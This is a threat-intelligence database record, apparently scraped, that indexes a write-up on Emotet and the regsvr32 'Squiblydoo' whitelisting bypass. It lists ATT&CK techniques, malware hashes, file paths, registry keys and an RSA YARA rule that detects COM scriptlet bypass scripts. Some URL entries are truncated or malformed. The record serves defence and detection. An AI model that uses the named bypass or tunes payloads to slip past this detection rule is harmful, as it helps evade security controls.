ioc[.]one - OSINT Cyber Threat Intelligence Database

Incident Response Games — #1 EMOTET | Squiblydoo

Tags

country:

attack-pattern:

Direct Control Panel - T1218.002 Hidden Window - T1564.003 Hide Artifacts - T1628 Hide Artifacts - T1564 Ip Addresses - T1590.005 Malware - T1587.001 Malware - T1588.001 Process Discovery - T1424 Non-Standard Port - T1509 Non-Standard Port - T1571 Ntfs File Attributes - T1564.004 Regsvr32 - T1218.010 Software - T1592.002 Tool - T1588.002 Hidden Window - T1143 Ntfs File Attributes - T1096 Process Discovery - T1057 Regsvr32 - T1117

Show in Graph

Common Information

Type	Value
UUID	1a6c1036-2d0a-472e-8047-1215bd6a8bae
Fingerprint	b424190ca9f506d1
Analysis status	DONE
Considered CTI value	2
Text language
Published	May 7, 2023, 7:41 a.m.
Added to db	May 7, 2023, 9:48 a.m.
Last updated	Nov. 17, 2024, 6:54 p.m.
Headline	Incident Response Games — #1 EMOTET \| Squiblydoo
Title	Incident Response Games — #1 EMOTET \| Squiblydoo
Detected Hints/Tags/Attributes	59/2/48

Source URLs

	Redirection	Url
Details	Source	https://medium.com/@idanbuller/incident-response-games-1-emotet-squiblydoo-61c52c2db79e?source=rss------cybersecurity-5
Details	Source	https://medium.com/@idanbuller/incident-response-games-1-emotet-squiblydoo-61c52c2db79e?source=rss------malware-5

URL Provider

Details	Provider	Source level domain
Details	medium.com	medium.com

RSS Feed

Details	Id	Enabled	Feed title	Url	Added to db
Details	167	✔	Cybersecurity on Medium	https://medium.com/feed/tag/cybersecurity	2024-08-30 22:08
Details	171	✔	Malware on Medium	https://medium.com/feed/tag/malware	2024-08-30 22:08

Attributes

Details	Type	#Events	Value
Details	Domain	93	bazaar.abuse.ch
Details	Domain	145	threatpost.com
Details	Domain	32	lolbas-project.github.io
Details	Domain	11	filescan.io
Details	Domain	3	laposte.net
Details	Domain	1	olivierlanglois.net
Details	Domain	2	subt0x10.blogspot.com
Details	Email	1	marclacroixlanglois@laposte.net
Details	Email	1	olivier@olivierlanglois.net
Details	File	459	regsvr32.exe
Details	File	62	scrobj.dll
Details	File	1	nghiru.exe
Details	File	1	bf757fc27bc718f99334d289d95394a7d4db443a23fd61a4731a00bb5bd8d4a7.exe
Details	File	1	c:\windows\system32\oealmot\auqznoxmif.dll
Details	File	1	auqznoxmif.dll
Details	File	1260	explorer.exe
Details	File	1	c:\users\keecfmwgj\desktop\nghiru.exe
Details	File	23	c:\windows\system32\regsvr32.exe
Details	File	185	shell32.dll
Details	File	229	advapi32.dll
Details	File	83	crypt32.dll
Details	File	748	kernel32.dll
Details	File	9	oleacc.dll
Details	File	47	oleaut32.dll
Details	File	69	shlwapi.dll
Details	File	291	user32.dll
Details	File	19	winspool.drv
Details	File	30	comctl32.dll
Details	File	3	bypass-application-whitelisting-script.html
Details	md5	1	bccc6d71afc053a5af18142c4926be98
Details	sha1	1	3b5636fbd1f27a0fccce547d6579dc7c6a4c99d9
Details	sha256	1	bf757fc27bc718f99334d289d95394a7d4db443a23fd61a4731a00bb5bd8d4a7
Details	MITRE ATT&CK Techniques	13	T1564.004
Details	MITRE ATT&CK Techniques	66	T1564.003
Details	MITRE ATT&CK Techniques	115	T1571
Details	MITRE ATT&CK Techniques	433	T1057
Details	Url	1	https://bazaar.abuse.ch/sample/bf757fc27bc718f99334d289d95394a7d4db443a23fd61a4731a00bb5bd8d4a7
Details	Url	1	https://threatpost.com/cybercriminals-windows-utility-regsvr32-malware/178333
Details	Url	1	https://lolbas-project.github.io/lolbas/binaries/regsvr32/).in
Details	Url	1	http://www.amazon.com/exec/obidos/redirect?link_code=ur2&tag=olivielanglos-20&camp=1789&creative=9325&path=http://www.amaz
Details	Url	1	http://www.olivierlanglois.net9mailto:olivier@olivierlanglois.net?subject=clover
Details	Url	1	https://community.rsa.com/community/products/netwitness/blog/2016/04/26/detection-of-com-whitelist-bypassing-with-ecat
Details	Url	2	http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html
Details	Windows Registry Key	1	HKEY_CLASSES_ROOT\ocxfile\AutoRegister
Details	Windows Registry Key	1	HKEY_CLASSES_ROOT\dllfile\AutoRegister
Details	Windows Registry Key	3	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser
Details	Windows Registry Key	1	HKEY_CLASSES_ROOT\ocxfile
Details	Yara rule	1	rule RSA_IR_Windows_COM_bypass_script { meta: author = "RSA IR" Date = "22 Apr 2016" reference = "https://community.rsa.com/community/products/netwitness/blog/2016/04/26/detection-of-com-whitelist-bypassing-with-ecat" comment1 = "Detects potential scripts used by COM+ Whitelist Bypass" comment2 = "More information on bypass located at: http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html" strings: $s1 = "<scriptlet>" nocase $s2 = "<registration" nocase $s3 = "classid=" nocase $s4 = "[CDATA[" nocase $s5 = "</script>" nocase $s6 = "</registration>" nocase $s7 = "</scriptlet>" nocase condition: all of ($s*) }